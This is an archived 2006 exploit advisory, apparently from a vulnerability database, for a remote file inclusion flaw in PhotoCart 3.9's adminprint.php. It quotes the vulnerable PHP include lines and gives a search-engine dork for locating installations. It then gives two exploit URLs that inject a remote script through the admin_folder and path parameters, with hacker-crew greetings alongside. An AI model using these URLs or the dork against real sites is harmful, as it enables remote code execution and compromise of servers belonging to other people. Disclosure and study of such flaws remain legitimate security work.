Lucene search
SecurityvulnsSECURITYVULNS:DOC:15197HistoryNov 22, 2006 - 12:00 a.m.
PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
2006-11-2200:00:00
vulners.com
145
#####################################################################################################
PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
Script site: http://www.picturespro.com/store/programs/129-photo_cart.html
Dork : inurl :/PhotoCart/
#####################################################################################################
Bug Found By : irvian
####################################################################################################
GreetZ: jipank,kacung,trangkil,ibnusina,cah|gemblunkz,zoid
Special greetz: #patihack #hitamputih #nyubicrew
#####################################################################################################
bug found on /PhotoCart/adminprint.php
include "setup.php";
$path = "$path";
$path = "$path";
include "$admin_folder/_admin_functions.php";
include "$path/_db.php";
adminsessionCheck();
Expl: http://www.site.com/PhotoCart/adminprint.php?admin_folder=[evil_scripts]
http://www.site.com/PhotoCart/adminprint.php?path=[evil_scripts]